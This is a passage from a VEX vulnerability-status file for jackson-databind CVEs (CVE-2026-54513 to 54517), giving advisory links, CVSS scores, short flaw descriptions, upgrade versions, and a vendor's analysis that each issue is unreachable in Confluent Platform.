        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40895"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41951"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43218"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43400"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44061"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44062"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44063"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44065"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44066"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44271"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:48095"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:48151"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50846"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50847"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50848"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50849"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54435"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54622"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54513"
        },
        {
          "url": "https://bugzilla.redhat.com/2492010"
        },
        {
          "url": "https://bugzilla.redhat.com/2492015"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492010"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-54513"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-40895.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:43218"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/01d1692c8d0ed03e51a0e3c4f8a9e6908e4931e5"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/24529da29fdf46ff94ca38de9ebf31cd188f5e8e"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5981"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5983"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5984"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-rmj7-2vxq-3g9f"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-54513.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-43400.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54513"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-54513.json"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54513"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-08-14T13:19:03+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2",
          "versions": [
            {
              "version": "2.21.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0e4b26f6-09d2-4380-b0de-d13c030e4632/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a6beed9c-6ff1-4b5c-893e-cff8f44e2bc1/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#ed39dfdb-395c-4d98-a3f6-f3bbae960502"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a87f064b-ed47-4786-b3b6-55b4d706f212/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#8a946054-d4de-4fae-be17-c8def7953482"
        },
        {
          "ref": "urn:cdx:f33a27b8-0294-423c-85bb-8d008dbc42b5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#e272d2d7-ad51-44fe-ad2f-78acb7605ccc"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#e1daa1f8-3fbc-466d-bdfa-3606171f026b"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#27722e9c-480d-463c-9471-3e28fff661ce"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#d1a8375b-7e80-4a4b-9a19-e5181eec10bb"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#c2d8b33e-2a7c-4028-9a5f-d0a149bf6a68"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#91781c8e-7326-4ffd-aa21-e9a4bed6aa64"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#f9bc8a73-638a-436a-b948-1b57cd1a3738"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#0df291d2-a463-48a8-8a00-212c73132383"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c59920ed-da76-4143-86fb-af4890d96240"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#fe3ca0fc-606d-4691-9791-677398b734ba"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#3b2fc3d8-256a-4379-8c7a-46bfd2080520"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. the product does not enable class-based polymorphic deserialization (default typing, or @JsonTypeInfo with Id.CLASS/Id.MINIMAL_CLASS) on untrusted input, so the array-subtype PolymorphicTypeValidator bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-54514",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        }
      ],
      "cwes": [
        918
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.0.0 until 2.18.8, 2.21.4, and 3.1.4, JDKFromStringDeserializer constructed InetSocketAddress with new InetSocketAddress(host, port), which performs eager DNS name resolution for hostname inputs at deserialization time. An application that binds untrusted JSON into a type containing an InetSocketAddress field issues an attacker-chosen DNS query during readValue, before any application-level validation or connect logic. The fix uses InetSocketAddress.createUnresolved(host, port), deferring DNS to an explicit connect. This vulnerability is fixed in 2.18.8, 2.21.4, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.8, 2.21.4, 3.1.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54514"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54514"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/1f5a1037b1e9e05920e755cb35f198bcd46667e4"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5951"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-hgj6-7826-r7m5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54514"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54514"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-06-27T20:55:09+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2",
          "versions": [
            {
              "version": "2.21.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0e4b26f6-09d2-4380-b0de-d13c030e4632/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a6beed9c-6ff1-4b5c-893e-cff8f44e2bc1/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#ed39dfdb-395c-4d98-a3f6-f3bbae960502"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a87f064b-ed47-4786-b3b6-55b4d706f212/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#8a946054-d4de-4fae-be17-c8def7953482"
        },
        {
          "ref": "urn:cdx:f33a27b8-0294-423c-85bb-8d008dbc42b5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#e272d2d7-ad51-44fe-ad2f-78acb7605ccc"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#e1daa1f8-3fbc-466d-bdfa-3606171f026b"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#27722e9c-480d-463c-9471-3e28fff661ce"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#d1a8375b-7e80-4a4b-9a19-e5181eec10bb"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#c2d8b33e-2a7c-4028-9a5f-d0a149bf6a68"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#91781c8e-7326-4ffd-aa21-e9a4bed6aa64"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#f9bc8a73-638a-436a-b948-1b57cd1a3738"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#0df291d2-a463-48a8-8a00-212c73132383"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c59920ed-da76-4143-86fb-af4890d96240"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#fe3ca0fc-606d-4691-9791-677398b734ba"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#3b2fc3d8-256a-4379-8c7a-46bfd2080520"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. no attacker-controlled JSON is deserialized into a java.net.InetSocketAddress (the type appears only in networking code, not bound via jackson), so the eager-DNS-resolution SSRF path is not reachable."
      }
    },
    {
      "id": "CVE-2026-54515",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        915
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.8.0 until 2.18.9, 2.21.5, and 3.1.4, in BeanDeserializerBase.createContextual(), per-property @JsonIgnoreProperties exclusions are applied by _handleByNameInclusion(), producing a contextual deserializer whose BeanPropertyMap has the ignored properties removed. The subsequent per-property case-insensitivity block (triggered by @JsonFormat(ACCEPT_CASE_INSENSITIVE_PROPERTIES)) rebuilds from this._beanProperties (the original, unfiltered map) instead of contextual._beanProperties, then overwrites the filtered map \u2014 restoring every property _handleByNameInclusion had just removed. The ignored property becomes writable again. This vulnerability is fixed in 2.18.9, 2.21.5, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 3.1.4, 2.18.9, 2.21.5, 2.22.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54515"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54515"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/0e1b0b211f7a53baa62ba2f4c9bd006c7bf4d5fa"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5962"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5964"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-5jmj-h7xm-6q6v"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54515"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54515"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-06-29T13:38:59+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2",
          "versions": [
            {
              "version": "2.21.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0e4b26f6-09d2-4380-b0de-d13c030e4632/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a6beed9c-6ff1-4b5c-893e-cff8f44e2bc1/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#ed39dfdb-395c-4d98-a3f6-f3bbae960502"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a87f064b-ed47-4786-b3b6-55b4d706f212/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#8a946054-d4de-4fae-be17-c8def7953482"
        },
        {
          "ref": "urn:cdx:f33a27b8-0294-423c-85bb-8d008dbc42b5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#e272d2d7-ad51-44fe-ad2f-78acb7605ccc"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#e1daa1f8-3fbc-466d-bdfa-3606171f026b"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#27722e9c-480d-463c-9471-3e28fff661ce"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#d1a8375b-7e80-4a4b-9a19-e5181eec10bb"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#c2d8b33e-2a7c-4028-9a5f-d0a149bf6a68"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#91781c8e-7326-4ffd-aa21-e9a4bed6aa64"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#f9bc8a73-638a-436a-b948-1b57cd1a3738"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#0df291d2-a463-48a8-8a00-212c73132383"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c59920ed-da76-4143-86fb-af4890d96240"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#fe3ca0fc-606d-4691-9791-677398b734ba"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#3b2fc3d8-256a-4379-8c7a-46bfd2080520"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. MapperFeature.ACCEPT_CASE_INSENSITIVE_PROPERTIES is not enabled in the product, so the case-insensitive @JsonIgnoreProperties bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-54516",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        915
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.21.0 until 2.21.4 and 3.1.4, POJOPropertiesCollector._renameProperties() allows a property with @JsonProperty(\"renamed\") on the getter and @JsonIgnore on the setter to be renamed rather than dropped. With MapperFeature.INFER_PROPERTY_MUTATORS enabled (default), the private backing field is retained; during deserialization BeanDeserializerFactory.addBeanProps() sees hasField()==true, builds a FieldProperty, and makes the backing field writable. An attacker supplying the renamed JSON key writes the backing field directly, bypassing the @JsonIgnore on the setter. This vulnerability is fixed in 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.21.4, 3.1.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54516"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54516"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/c3d56dd25d52319828147c5b9aeabf2d485c250a"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/e88cb17006b6af4883b973058f0bb6486e5074af"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5967"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5968"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-9fxm-vc8v-hj55"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54516"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54516"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-06-27T20:52:12+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2",
          "versions": [
            {
              "version": "2.21.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0e4b26f6-09d2-4380-b0de-d13c030e4632/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a6beed9c-6ff1-4b5c-893e-cff8f44e2bc1/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#ed39dfdb-395c-4d98-a3f6-f3bbae960502"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a87f064b-ed47-4786-b3b6-55b4d706f212/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#8a946054-d4de-4fae-be17-c8def7953482"
        },
        {
          "ref": "urn:cdx:f33a27b8-0294-423c-85bb-8d008dbc42b5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#e272d2d7-ad51-44fe-ad2f-78acb7605ccc"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#e1daa1f8-3fbc-466d-bdfa-3606171f026b"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#27722e9c-480d-463c-9471-3e28fff661ce"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#d1a8375b-7e80-4a4b-9a19-e5181eec10bb"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#c2d8b33e-2a7c-4028-9a5f-d0a149bf6a68"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#91781c8e-7326-4ffd-aa21-e9a4bed6aa64"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#f9bc8a73-638a-436a-b948-1b57cd1a3738"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#0df291d2-a463-48a8-8a00-212c73132383"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c59920ed-da76-4143-86fb-af4890d96240"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#fe3ca0fc-606d-4691-9791-677398b734ba"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#3b2fc3d8-256a-4379-8c7a-46bfd2080520"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. the product does not deserialize untrusted JSON into types using the renamed @JsonIgnore-setter/private-field pattern, so the bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-54517",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        }
      ],
      "cwes": [
        863
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.21.0 until 2.21.4 and 3.1.4, in BeanDeserializer._deserializeUsingPropertyBased, the active-view (@JsonView) filter was applied only to creator properties; the regular property-buffering branch performed no prop.visibleInView(activeView) check. A change making SetterlessProperty.isMerging() return true routed setterless Collection/Map properties through this unguarded path, so a setterless collection annotated with a restricted @JsonView is populated from attacker JSON even when the active view excludes it. This vulnerability is fixed in 2.21.4 and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.21.4, 3.1.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54517"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54517"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/5bf23edb4221f7dd2ec8e71ff6d26c61640f261d"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/94c5d215b3af1505098c686405d9641f041a9962"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5969"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5970"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-5hh8-q8hv-fr38"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54517"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54517"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-06-27T20:51:09+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2",
          "versions": [
            {
              "version": "2.21.2",
              "status": "affected"
            }
          ]
        },
        {
